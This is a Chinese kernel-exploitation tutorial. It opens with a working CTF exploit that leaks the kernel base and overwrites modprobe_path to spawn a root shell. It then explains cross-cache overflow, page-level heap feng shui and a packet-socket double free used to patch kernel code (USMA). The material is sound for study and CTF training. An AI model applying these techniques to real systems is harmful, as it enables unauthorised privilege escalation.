exp 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 #include "src/pwn_helper.h" #define BOF_MALLOC 5 #define BOF_FREE 7 #define BOF_WRITE 8 #define BOF_READ 9 size_t modprobe_path = 0xFFFFFFFF81E48140 ;size_t seq_ops_start = 0xffffffff81228d90 ;struct param { size_t len; size_t *buf; long long idx; }; void alloc_buf (int fd, struct param* p) { printf ("[+] kmalloc len:%lu idx:%lld\n" , p->len, p->idx); ioctl(fd, BOF_MALLOC, p); } void free_buf (int fd, struct param* p) { printf ("[+] kfree len:%lu idx:%lld\n" , p->len, p->idx); ioctl(fd, BOF_FREE, p); } void read_buf (int fd, struct param* p) { printf ("[+] copy_to_user len:%lu idx:%lld\n" , p->len, p->idx); ioctl(fd, BOF_READ, p); } void write_buf (int fd, struct param* p) { printf ("[+] copy_from_user len:%lu idx:%lld\n" , p->len, p->idx); ioctl(fd, BOF_WRITE, p); } int main () { size_t * buf = malloc (0x500 ); struct param p = {0x20 , buf, 0 }; printf ("[+] user_buf : %p\n" , p.buf); int bof_fd = open("/dev/bof" , O_RDWR); if (bof_fd < 0 ) { puts (RED "[-] Failed to open bof." 
NONE); exit (-1 ); } printf (YELLOW "[*] try to leak kbase\n" NONE); alloc_buf(bof_fd, &p); free_buf(bof_fd, &p); int seq_fd = open("/proc/self/stat" , O_RDONLY); read_buf(bof_fd, &p); qword_dump("leak seq_ops" , buf, 0x20 ); size_t kernel_offset = buf[0 ] - seq_ops_start; printf (YELLOW "[*] kernel_offset %p\n" NONE, (void *)kernel_offset); modprobe_path += kernel_offset; printf (LIGHT_BLUE "[*] modprobe_path addr : %p\n" NONE, (void *)modprobe_path); p.len = 0xa8 ; alloc_buf(bof_fd, &p); free_buf(bof_fd, &p); read_buf(bof_fd, &p); buf[0 ] = modprobe_path - 0x20 ; write_buf(bof_fd, &p); alloc_buf(bof_fd, &p); alloc_buf(bof_fd, &p); read_buf(bof_fd, &p); qword_dump("leak modprobe_path" , buf, 0x30 ); strcpy ((char *) &buf[4 ], "/tmp/shell.sh\x00" ); write_buf(bof_fd, &p); read_buf(bof_fd, &p); qword_dump("leak modprobe_path" , buf, 0x30 ); if (open("/shell.sh" , O_RDWR) < 0 ) { system("echo '#!/bin/sh' >> /tmp/shell.sh" ); system("echo 'setsid /bin/cttyhack setuidgid 0 /bin/sh' >> /tmp/shell.sh" ); system("chmod +x /tmp/shell.sh" ); } system("echo -e '\\xff\\xff\\xff\\xff' > /tmp/fake" ); system("chmod +x /tmp/fake" ); system("/tmp/fake" ); return 0 ; }
Page-level Fengshui 利用思路 Cross-Cache-Overflow 实际上是针对 buddy system 的利用手法。
slub allocator 底层逻辑是向 buddy system 请求页面后再划分成特定大小 object 返还给上层调用者
→ 内存中用作不同 kmem_cache 的页面在内存上是有可能相邻的。
若我们的漏洞对象存在于页面 A,溢出目标对象存在于页面 B,且 A、B两页面相邻,则我们便有可能实现跨越不同 kmem_cache 之间的堆溢出。
首先让我们重新审视 slub allocator 向 buddy system 请求页面的过程,当 freelist page 已经耗空且 partial 链表也为空时(或者 kmem_cache 刚刚创建后进行第一次分配时),其会向 buddy system 申请页面:
接下来让我们重新审视 buddy system ,其基本原理就是以 2 的 order 次幂张内存页作为分配粒度,相同 order 间空闲页面构成双向链表,当低阶 order 的页面不够用时便会从高阶 order 取一份连续内存页拆成两半,其中一半挂回当前请求 order 链表,另一半返还给上层调用者;下图为以 order 2 为例的 buddy system 页面分配基本原理:
我们不难想到的是:从更高阶 order 拆分成的两份低阶 order 的连续内存页是物理连续的 ,由此我们可以:
向 buddy system 请求两份连续的内存页。
释放其中一份内存页,在 vulnerable kmem_cache 上堆喷,让其取走这份内存页。
释放另一份内存页,在 victim kmem_cache 上堆喷,让其取走这份内存页。
此时我们便有可能溢出到其他的内核结构体上,从而完成 cross-cache overflow 。
注意 slub 申请的 object 位于线性映射区,因此溢出修改的是物理地址相邻的内存页。而 buddy system 的特性可以保证两个物理页物理地址相邻。
在实际情况中我们无法准确控制 buddy system ,因此这一步骤改为:
向 buddy system 请求大量的内存页
释放其中一半内存页,在 vulnerable kmem_cache 上堆喷,让其取走这些内存页
释放另一半内存页,在 victim kmem_cache 上堆喷,让其取走这些内存页
这样我们有很大概率构造出上面那种情况,从而可以溢出到其他的内核结构体上完成 cross-cache overflow 。
使用 setsockopt 与 pgv 完成页级内存占位与堆风水
当我们创建一个 protocol 为 PF_PACKET 的 socket 之后,先调用 setsockopt() 将 PACKET_VERSION 设为 TPACKET_V1 / TPACKET_V2,再调用 setsockopt() 提交一个 PACKET_TX_RING ,此时便存在如下调用链:
1 2 3 4 5 __sys_setsockopt() sock->ops->setsockopt() packet_setsockopt() packet_set_ring() alloc_pg_vec()
在 alloc_pg_vec() 中会创建一个 pgv 结构体,用以分配 tp_block_nr 份 2^order(2 的 order 次幂)张内存页,其中 order 由 tp_block_size 决定:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 static struct pgv *alloc_pg_vec (struct tpacket_req *req, int order) { unsigned int block_nr = req->tp_block_nr; struct pgv *pg_vec ; int i; pg_vec = kcalloc(block_nr, sizeof (struct pgv), GFP_KERNEL | __GFP_NOWARN); if (unlikely(!pg_vec)) goto out; for (i = 0 ; i < block_nr; i++) { pg_vec[i].buffer = alloc_one_pg_vec_page(order); if (unlikely(!pg_vec[i].buffer)) goto out_free_pgvec; } out: return pg_vec; out_free_pgvec: free_pg_vec(pg_vec, order, block_nr); pg_vec = NULL ; goto out; }
在 alloc_one_pg_vec_page() 中会直接调用 __get_free_pages() 向 buddy system 请求内存页,因此我们可以利用该函数进行大量的页面请求:
1 2 3 4 5 6 7 8 9 10 11 static char *alloc_one_pg_vec_page (unsigned long order) { char *buffer; gfp_t gfp_flags = GFP_KERNEL | __GFP_COMP | __GFP_ZERO | __GFP_NOWARN | __GFP_NORETRY; buffer = (char *) __get_free_pages(gfp_flags, order); if (buffer) return buffer; }
相应地, pgv 中的页面也会在 socket 被关闭后释放:
1 2 3 packet_release() packet_set_ring() free_pg_vec()
setsockopt() 也可以帮助我们完成页级堆风水 ,当我们耗尽 buddy system 中的 low order pages 后,我们再请求的页面便都是物理连续的,因此此时我们再进行 setsockopt() 便相当于获取到了一块近乎物理连续的内存 (之所以说是“近乎连续”,是因为大量的 setsockopt() 流程中同样会分配大量我们不需要的结构体,从而消耗 buddy system 的部分页面)。
exp Page-level UAF 利用思路 exp Dirty Pagetable 利用思路 exp USMA 这题我们以ARM64的内核为例。
socket系统调用
先了解一下socket系统调用创建套接字的过程。socket用于创建网络套接字,这个套接字可以发送和接收数据。具体使用如下:
1 2 3 4 5 6 7 8 9 10 11 int socket (int family, int type, int protocol) ;socket(AF_INET, SOCK_STREAM, 0 );
socket()调用使用sock_create()创建套接字,并使用sock_map_fd()返回相应的文件描述符。
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 int __sys_socket(int family, int type, int protocol){ int retval; struct socket *sock ; int flags; retval = sock_create(family, type, protocol, &sock); if (retval < 0 ) return retval; return sock_map_fd(sock, flags & (O_CLOEXEC | O_NONBLOCK)); }
sock_create()创建套接字,会调用sock_create()->__sock_create(),首先通过sock_alloc()分配socket结构体,然后通过传入的family获取协议模块,再通过协议模块的ops(pf->create),来初始化socket。
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 int sock_create (int family, int type, int protocol, struct socket **res) { return __sock_create(current->nsproxy->net_ns, family, type, protocol, res, 0 ); } int __sock_create(struct net *net, int family, int type, int protocol, struct socket **res, int kern) { int err; struct socket *sock ; const struct net_proto_family *pf ; sock = sock_alloc(); if (!sock) { net_warn_ratelimited("socket: no more sockets\n" ); return -ENFILE; } sock->type = type; rcu_read_lock(); pf = rcu_dereference(net_families[family]); err = -EAFNOSUPPORT; if (!pf) goto out_release; if (!try_module_get(pf->owner)) goto out_release; rcu_read_unlock(); err = pf->create(net, sock, protocol, kern); if (err < 0 ) goto out_module_put; *res = sock; return 0 ; }
在根据传入的family获取协议模块的时候,通过交叉索引找到sock_register()为相应net_families[]的注册函数
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 int sock_register (const struct net_proto_family *ops) { int err; if (ops->family >= NPROTO) { pr_crit("protocol %d >= NPROTO(%d)\n" , ops->family, NPROTO); return -ENOBUFS; } spin_lock(&net_family_lock); if (rcu_dereference_protected(net_families[ops->family], lockdep_is_held(&net_family_lock))) err = -EEXIST; else { rcu_assign_pointer(net_families[ops->family], ops); err = 0 ; } spin_unlock(&net_family_lock); pr_info("NET: Registered protocol family %d\n" , ops->family); return err; }
在net/packet/af_packet.c中找到注册函数的调用,这里family为PF_PACKET,同时create为packet_create(),继续分析create函数
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 static const struct net_proto_family packet_family_ops = { .family = PF_PACKET, .create = packet_create, .owner = THIS_MODULE, }; static int __init packet_init (void ) { int rc; rc = sock_register(&packet_family_ops); if (rc) goto out_proto; return 0 ; }
packet_create()会先对套接字的type做检查,然后使用sk_alloc分配独立的object,函数指针(ops)的赋值需要注意,之后就是数据包和一些锁、钩子等操作。
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 static int packet_create (struct net *net, struct socket *sock, int protocol, int kern) { struct sock *sk ; struct packet_sock *po ; __be16 proto = (__force __be16)protocol; int err; if (!ns_capable(net->user_ns, CAP_NET_RAW)) return -EPERM; if (sock->type != SOCK_DGRAM && sock->type != SOCK_RAW && sock->type != SOCK_PACKET) return -ESOCKTNOSUPPORT; sock->state = SS_UNCONNECTED; err = -ENOBUFS; sk = sk_alloc(net, PF_PACKET, GFP_KERNEL, &packet_proto, kern); if (sk == NULL ) goto out; sock->ops = &packet_ops; if (sock->type == SOCK_PACKET) sock->ops = &packet_ops_spkt; sock_init_data(sock, sk); po = pkt_sk(sk); init_completion(&po->skb_completion); sk->sk_family = PF_PACKET; po->num = proto; po->xmit = dev_queue_xmit; } static const struct proto_ops packet_ops = { .family = PF_PACKET, .owner = THIS_MODULE, .release = packet_release, .bind = packet_bind, .connect = sock_no_connect, .socketpair = sock_no_socketpair, .accept = sock_no_accept, .getname = packet_getname, .poll = packet_poll, .ioctl = packet_ioctl, .gettstamp = sock_gettstamp, .listen = sock_no_listen, .shutdown = sock_no_shutdown, .setsockopt = packet_setsockopt, .getsockopt = packet_getsockopt, .sendmsg = packet_sendmsg, .recvmsg = packet_recvmsg, .mmap = packet_mmap, .sendpage = sock_no_sendpage, };
基本了解了socket创建和初始化的过程之后,我们进一步了解漏洞的产生原因。
setsockopt
允许开发者灵活配置套接字的行为,以满足应用程序的更多特定需求。具体调用参数如下:
1 2 3 4 5 6 7 8 9 10 11 int setsockopt (int sockfd, int level, int optname, const void *optval, socklen_t optlen) ;sockfd = socket(AF_INET, SOCK_STREAM, 0 ); setsockopt(sockfd, SOL_SOCKET, SO_REUSEADDR, &opt, sizeof (opt)) __sys_setsockopt()
SOL_SOCKET套接字层,进行调用sock_setsockopt()
其他层,调用sock->ops->setsockopt的指针函数
我们需要的是调用sock->ops->setsockopt,所以需要设置level不是SOL_SOCKET
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 int __sys_setsockopt(int fd, int level, int optname, char __user *user_optval, int optlen) { sockptr_t optval = USER_SOCKPTR(user_optval); char *kernel_optval = NULL ; int err, fput_needed; struct socket *sock ; if (optlen < 0 ) return -EINVAL; sock = sockfd_lookup_light(fd, &err, &fput_needed); if (!sock) return err; if (level == SOL_SOCKET && !sock_use_custom_sol_socket(sock)) err = sock_setsockopt(sock, level, optname, optval, optlen); else if (unlikely(!sock->ops->setsockopt)) err = -EOPNOTSUPP; else err = sock->ops->setsockopt(sock, level, optname, optval, optlen); return err; }
sock->ops==packet_ops时调用packet_setsockopt(),该函数通过optname提供了一个菜单式的选项。我们主要关注环形缓冲区(PACKET_RX_RING / PACKET_TX_RING)的处理:会先根据版本确定长度,再把用户传入的数据复制到req_u中,进而调用packet_set_ring()设置环形缓冲区。
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 static int packet_setsockopt (struct socket *sock, int level, int optname, sockptr_t optval, unsigned int optlen) { struct sock *sk = sock->sk; struct packet_sock *po = pkt_sk(sk); int ret; if (level != SOL_PACKET) return -ENOPROTOOPT; switch (optname) { case PACKET_RX_RING: case PACKET_TX_RING: { union tpacket_req_u req_u ; int len; lock_sock(sk); switch (po->tp_version) { case TPACKET_V1: case TPACKET_V2: len = sizeof (req_u.req); break ; case TPACKET_V3: default : len = sizeof (req_u.req3); break ; } if (optlen < len) { ret = -EINVAL; } else { if (copy_from_sockptr(&req_u.req, optval, len)) ret = -EFAULT; else ret = packet_set_ring(sk, &req_u, 0 , optname == PACKET_TX_RING); } release_sock(sk); return ret; } }
packet socket模块,可以让用户在设备驱动层接收和发送raw packets,并且为了加速数据报文的拷贝,它允许用户创建一块与内核态共享的环形缓冲区。具体的创建操作是在packet_set_ring()函数中实现的。
继续跟进packet_set_ring(),首先会进行各种各样的初始化操作,关键点在于TPACKET_V3版本下调用init_prb_bdqc()初始化的时候, packet_ring_buffer.prb_bdqc.pkbdq持有一个pg_vec引用,并且后期释放pg_vec时并没有清除该引用,导致可以double free。
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 198 199 200 201 202 203 204 struct pgv { char *buffer; }; struct packet_ring_buffer { struct pgv *pg_vec ; unsigned int head; unsigned int frames_per_block; unsigned int frame_size; unsigned int frame_max; unsigned int pg_vec_order; unsigned int pg_vec_pages; unsigned int pg_vec_len; unsigned int __percpu *pending_refcnt; union { unsigned long *rx_owner_map; struct tpacket_kbdq_core prb_bdqc ; }; }; static int packet_set_ring (struct sock *sk, union tpacket_req_u *req_u, int closing, int tx_ring) { struct pgv *pg_vec = NULL ; struct packet_sock *po = pkt_sk(sk); unsigned long *rx_owner_map = NULL ; int was_running, order = 0 ; struct packet_ring_buffer *rb ; struct sk_buff_head *rb_queue ; __be16 num; int err; struct tpacket_req *req = &req_u->req; rb = tx_ring ? &po->tx_ring : &po->rx_ring; rb_queue = tx_ring ? 
&sk->sk_write_queue : &sk->sk_receive_queue; err = -EBUSY; if (!closing) { if (atomic_read (&po->mapped)) goto out; if (packet_read_pending(rb)) goto out; } if (req->tp_block_nr) { unsigned int min_frame_size; err = -EBUSY; if (unlikely(rb->pg_vec)) goto out; switch (po->tp_version) { case TPACKET_V1: po->tp_hdrlen = TPACKET_HDRLEN; break ; case TPACKET_V2: po->tp_hdrlen = TPACKET2_HDRLEN; break ; case TPACKET_V3: po->tp_hdrlen = TPACKET3_HDRLEN; break ; } err = -EINVAL; if (unlikely((int )req->tp_block_size <= 0 )) goto out; if (unlikely(!PAGE_ALIGNED(req->tp_block_size))) goto out; min_frame_size = po->tp_hdrlen + po->tp_reserve; if (po->tp_version >= TPACKET_V3 && req->tp_block_size < BLK_PLUS_PRIV((u64)req_u->req3.tp_sizeof_priv) + min_frame_size) goto out; if (unlikely(req->tp_frame_size < min_frame_size)) goto out; if (unlikely(req->tp_frame_size & (TPACKET_ALIGNMENT - 1 ))) goto out; rb->frames_per_block = req->tp_block_size / req->tp_frame_size; if (unlikely(rb->frames_per_block == 0 )) goto out; if (unlikely(rb->frames_per_block > UINT_MAX / req->tp_block_nr)) goto out; if (unlikely((rb->frames_per_block * req->tp_block_nr) != req->tp_frame_nr)) goto out; err = -ENOMEM; order = get_order(req->tp_block_size); pg_vec = alloc_pg_vec(req, order); if (unlikely(!pg_vec)) goto out; switch (po->tp_version) { case TPACKET_V3: if (!tx_ring) { init_prb_bdqc(po, rb, pg_vec, req_u); } else { struct tpacket_req3 *req3 = &req_u->req3; if (req3->tp_retire_blk_tov || req3->tp_sizeof_priv || req3->tp_feature_req_word) { err = -EINVAL; goto out_free_pg_vec; } } break ; default : if (!tx_ring) { rx_owner_map = bitmap_alloc(req->tp_frame_nr, GFP_KERNEL | __GFP_NOWARN | __GFP_ZERO); if (!rx_owner_map) goto out_free_pg_vec; } break ; } } else { err = -EINVAL; if (unlikely(req->tp_frame_nr)) goto out; } spin_lock(&po->bind_lock); was_running = po->running; num = po->num; if (was_running) { po->num = 0 ; __unregister_prot_hook(sk, false ); } spin_unlock(&po->bind_lock); 
synchronize_net(); err = -EBUSY; mutex_lock(&po->pg_vec_lock); if (closing || atomic_read (&po->mapped) == 0 ) { err = 0 ; spin_lock_bh(&rb_queue->lock); swap(rb->pg_vec, pg_vec); if (po->tp_version <= TPACKET_V2) swap(rb->rx_owner_map, rx_owner_map); } out_free_pg_vec: bitmap_free(rx_owner_map); if (pg_vec) free_pg_vec(pg_vec, order, req->tp_block_nr); out: return err; }
先进行释放pg_vec的操作,但是packet_ring_buffer.prb_bdqc.pkbdq仍然持有被释放的pg_vec,然后将packet socket的版本切换为TPACKET_V2并且再次设置缓冲区的时候,原本保存在pkbdq的pg_vec会被当做rx_owner_map再次释放,造成double free,因为rx_owner_map和prb_bdqc同属一个联合体,这里的rx_owner_map偏移为0,而pkbdq的偏移也是为0。
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 struct packet_ring_buffer { struct pgv * pg_vec ; unsigned int head; unsigned int frames_per_block; unsigned int frame_size; unsigned int frame_max; unsigned int pg_vec_order; unsigned int pg_vec_pages; unsigned int pg_vec_len; unsigned int * pending_refcnt; union { long unsigned int * rx_owner_map; struct tpacket_kbdq_core prb_bdqc ; }; }; struct tpacket_kbdq_core { struct pgv * pkbdq ; unsigned int feature_req_word; unsigned int hdrlen; };
并且在alloc_pg_vec()中发现申请的pg_vec大小为我们可控(block_nr),因此我们可以申请得到几乎任意大小的堆块。
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 static struct pgv *alloc_pg_vec (struct tpacket_req *req, int order) { unsigned int block_nr = req->tp_block_nr; struct pgv *pg_vec ; int i; pg_vec = kcalloc(block_nr, sizeof (struct pgv), GFP_KERNEL | __GFP_NOWARN); if (unlikely(!pg_vec)) goto out; for (i = 0 ; i < block_nr; i++) { pg_vec[i].buffer = alloc_one_pg_vec_page(order); if (unlikely(!pg_vec[i].buffer)) goto out_free_pgvec; } out: return pg_vec; }
了解漏洞的产生原因,进一步了解如何利用pg_vec。
mmap
mmap调用链sys_mmap()->ksys_mmap_pgoff()。ksys_mmap_pgoff()主要是针对大页映射的一个预处理,之后调用vm_mmap_pgoff().
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 unsigned long ksys_mmap_pgoff (unsigned long addr, unsigned long len, unsigned long prot, unsigned long flags, unsigned long fd, unsigned long pgoff) { struct file *file = NULL ; unsigned long retval; if (!(flags & MAP_ANONYMOUS)) { audit_mmap_fd(fd, flags); file = fget(fd); if (!file) return -EBADF; if (is_file_hugepages(file)) { len = ALIGN(len, huge_page_size(hstate_file(file))); } else if (unlikely(flags & MAP_HUGETLB)) { retval = -EINVAL; goto out_fput; } } else if (flags & MAP_HUGETLB) { struct user_struct *user = NULL ; struct hstate *hs ; hs = hstate_sizelog((flags >> MAP_HUGE_SHIFT) & MAP_HUGE_MASK); if (!hs) return -EINVAL; len = ALIGN(len, huge_page_size(hs)); file = hugetlb_file_setup(HUGETLB_ANON_FILE, len, VM_NORESERVE, &user, HUGETLB_ANONHUGE_INODE, (flags >> MAP_HUGE_SHIFT) & MAP_HUGE_MASK); if (IS_ERR(file)) return PTR_ERR(file); } flags &= ~(MAP_EXECUTABLE | MAP_DENYWRITE); retval = vm_mmap_pgoff(file, addr, len, prot, flags, pgoff); out_fput: if (file) fput(file); return retval; }
vm_mmap_pgoff(),会对虚拟内存空间先上写锁,然后调用do_mmap()进一步完成映射。
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 unsigned long vm_mmap_pgoff (struct file *file, unsigned long addr, unsigned long len, unsigned long prot, unsigned long flag, unsigned long pgoff) { unsigned long ret; struct mm_struct *mm = current->mm; unsigned long populate; LIST_HEAD(uf); ret = security_mmap_file(file, prot, flag); if (!ret) { if (mmap_write_lock_killable(mm)) return -EINTR; ret = do_mmap(file, addr, len, prot, flag, pgoff, &populate, &uf); mmap_write_unlock(mm); userfaultfd_unmap_complete(mm, &uf); if (populate) mm_populate(ret, populate); } return ret; }
在do_mmap()映射的时候主要选择查看文件匿名映射的一个过程。首先就是各种检查然后对映射方式进行选择之后调用核心函数mmap_region()进行映射。
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 unsigned long do_mmap (struct file *file, unsigned long addr, unsigned long len, unsigned long prot, unsigned long flags, unsigned long pgoff, unsigned long *populate, struct list_head *uf) { struct mm_struct *mm = current->mm; vm_flags_t vm_flags; int pkey = 0 ; *populate = 0 ; if (mm->map_count > sysctl_max_map_count) return -ENOMEM; addr = get_unmapped_area(file, addr, len, pgoff, flags); if (IS_ERR_VALUE(addr)) return addr; vm_flags = calc_vm_prot_bits(prot, pkey) | calc_vm_flag_bits(flags) | mm->def_flags | VM_MAYREAD | VM_MAYWRITE | VM_MAYEXEC; if (flags & MAP_LOCKED) if (!can_do_mlock()) return -EPERM; if (mlock_future_check(mm, vm_flags, len)) return -EAGAIN; if (file) { struct inode *inode = file_inode(file); switch (flags & MAP_TYPE) { case MAP_PRIVATE: if (!(file->f_mode & FMODE_READ)) return -EACCES; if (path_noexec(&file->f_path)) { if (vm_flags & VM_EXEC) return -EPERM; vm_flags &= ~VM_MAYEXEC; } if (!file->f_op->mmap) return -ENODEV; if (vm_flags & (VM_GROWSDOWN|VM_GROWSUP)) return -EINVAL; break ; default : return -EINVAL; } } if (flags & MAP_NORESERVE) { if (sysctl_overcommit_memory != OVERCOMMIT_NEVER) vm_flags |= VM_NORESERVE; if (file && is_file_hugepages(file)) vm_flags |= VM_NORESERVE; } addr = mmap_region(file, addr, len, vm_flags, pgoff, uf); if (!IS_ERR_VALUE(addr) && ((vm_flags & VM_LOCKED) || (flags & (MAP_POPULATE | MAP_NONBLOCK)) == MAP_POPULATE)) *populate = len; return addr; }
分析mmap_region()函数时,还是主要关心文件映射。映射的时候如果flags有MAP_FIXED,那就会强制映射该地址,但是可能会有映射重叠。接着会先判断能否与其他vma合并,如果可以合并就返回,不能合并就重新申请object来存储vma结构体,vma初始化之后,进入文件映射,会先将文件与vma关联,之后调用file自带的ops进行映射,最后将vma插入到管理的红黑树中,并对vma和文件做反向关联。
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 unsigned long mmap_region (struct file *file, unsigned long addr, unsigned long len, vm_flags_t vm_flags, unsigned long pgoff, struct list_head *uf) { struct mm_struct *mm = current->mm; struct vm_area_struct *vma , *prev , *merge ; int error; struct rb_node **rb_link , *rb_parent ; unsigned long charged = 0 ; if (!may_expand_vm(mm, vm_flags, len >> PAGE_SHIFT)) { unsigned long nr_pages; nr_pages = count_vma_pages_range(mm, addr, addr + len); if (!may_expand_vm(mm, vm_flags, (len >> PAGE_SHIFT) - nr_pages)) return -ENOMEM; } if (munmap_vma_range(mm, addr, len, &prev, &rb_link, &rb_parent, uf)) return -ENOMEM; vma = vma_merge(mm, prev, addr, addr + len, vm_flags, NULL , file, pgoff, NULL , NULL_VM_UFFD_CTX); if (vma) goto out; vma = vm_area_alloc(mm); if (!vma) { error = -ENOMEM; goto unacct_error; } vma->vm_start = addr; vma->vm_end = addr + len; vma->vm_flags = vm_flags; vma->vm_page_prot = vm_get_page_prot(vm_flags); vma->vm_pgoff = pgoff; if (file) { vma->vm_file = get_file(file); error = call_mmap(file, vma); if (error) goto unmap_and_free_vma; addr = vma->vm_start; vm_flags = vma->vm_flags; } vma_link(mm, vma, prev, rb_link, rb_parent); file = vma->vm_file; return addr; }
在最开始的socket介绍中知道packet_ops调用的ops->mmap为packet_mmap(),packet_mmap()会将pg_vec中的pages对应的物理页面与用户程序的vma绑定,也就是将网络数据包的接收和发送缓冲区映射到用户空间。
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 static int packet_mmap (struct file *file, struct socket *sock, struct vm_area_struct *vma) { start = vma->vm_start; for (rb = &po->rx_ring; rb <= &po->tx_ring; rb++) { if (rb->pg_vec == NULL ) continue ; for (i = 0 ; i < rb->pg_vec_len; i++) { struct page *page ; void *kaddr = rb->pg_vec[i].buffer; int pg_num; for (pg_num = 0 ; pg_num < rb->pg_vec_pages; pg_num++) { page = pgv_to_page(kaddr); err = vm_insert_page(vma, start, page); if (unlikely(err)) goto out; start += PAGE_SIZE; kaddr += PAGE_SIZE; } } } return err; }
mmap的时候可以映射socket的环形缓冲区到用户态,环形缓冲区在setsockopt的时候用pg_vec构造,使用GFP_KERNEL来申请的object,并且大小可控,这个时候通过堆块的漏洞去控制pg_vec的虚拟地址,然后再映射到用户态就可以实现对任意内核地址的控制。
调用链:vm_insert_page()->insert_page()->validate_page_before_insert()的时候会对page进行检查,检查page 是否为匿名页,是否为子系统分配的页,是否含有type。
1 2 3 4 5 6 7 8 9 10 11 12 static int validate_page_before_insert (struct page *page) { if (PageAnon(page) || PageSlab(page) || page_has_type(page)) return -EINVAL; flush_dcache_page(page); return 0 ; } static inline int page_has_type (struct page *page) { return (int )page->page_type < PAGE_MAPCOUNT_RESERVE; }
内存页的type为以下四种。
1 2 3 4 5 6 #define PAGE_MAPCOUNT_RESERVE -128 #define PG_buddy 0x00000080 #define PG_offline 0x00000100 #define PG_table 0x00000200 #define PG_guard 0x00000400
如果传入的page为内核代码的页,以上检查都可以绕过,就可以利用pg_vec修改内核代码段,这个时候传入__sys_setresuid/SyS_setresuid的内核代码页的虚拟地址,然后对逻辑判断处改为jmp/bl跳转就可以完成提权。
1 2 3 4 5 6 7 8 9 10 11 if ( !ns_capable(old->user_ns, 7 ) ) { if ( ruid_1 != -1 && ruid_1 != old->uid.val && ruid_1 != old->euid.val && (fixed_1 = -1 , ruid_1 != old->suid.val) || euid_1 != -1 && euid_1 != old->uid.val && euid_1 != old->euid.val && (fixed_1 = -1 , euid_1 != old->suid.val) || suid_1 != -1 && suid_1 != old->uid.val && suid_1 != old->euid.val && (fixed_1 = -1 , suid_1 != old->suid.val) ) { LABEL_24: abort_creds(new); return fixed_1; } }
利用思路 总结
setsockopt()调用packet_set_ring()时,若版本为TPACKET_V3,会通过init_prb_bdqc()对接收环进行初始化,此时packet_ring_buffer.prb_bdqc.pkbdq持有一个pg_vec引用,并且后期释放操作并没有对该位置进行清除。进而版本转换为TPACKET_V2时,rx_owner_map和prb_bdqc为一个联合体,并且偏移一致,导致残留的pg_vec会变成rx_owner_map指针,最后在释放操作的时候造成double free。
调用socket创建套接字,family为AF_PACKET,type为SOCK_RAW。
调用TPACKET_V3的setsockopt,创建环形缓冲区。
再次调用setsockopt,版本号还是TPACKET_V3,设置req->tp_block_nr为0,会释放第一次申请的缓冲区。
使用堆喷等手法申请回释放的pg_vec
调用TPACKET_V2的setsockopt,实现double free
劫持pg_vec指向内核地址,然后 patch 内核即可。
